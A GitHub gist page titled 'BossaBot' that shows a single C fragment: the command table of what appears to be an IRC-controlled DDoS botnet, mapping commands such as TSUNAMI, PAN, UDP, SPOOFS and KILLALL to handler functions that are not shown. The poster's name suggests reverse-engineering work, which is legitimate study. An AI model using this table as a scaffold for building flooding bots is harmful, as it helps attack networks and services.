Skip to content

Instantly share code, notes, and snippets.

@revENGR
Created May 3, 2020 10:31
Show Gist options
  • Save revENGR/9ca0940481c461e153dfdc8961cc9a29 to your computer and use it in GitHub Desktop.
Save revENGR/9ca0940481c461e153dfdc8961cc9a29 to your computer and use it in GitHub Desktop.
BossaBot
struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
{ "TSUNAMI", tsunami },
{ "PAN", pan },
{ "UDP", udp },
{ "UNKNOWN", unknown },
{ "NICK", nickc },
{ "SERVER", move },
{ "GETSPOOFS", getspoofs },
{ "SPOOFS", spoof },
{ "DISABLE", disable },
{ "ENABLE", enable },
{ "KILL", killd },
{ "GET", get },
{ "VERSION", version },
{ "KILLALL", killall },
{ "HELP", help },
{ (char *)0, (void (*)(int,char *,int,char **))0 } };
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment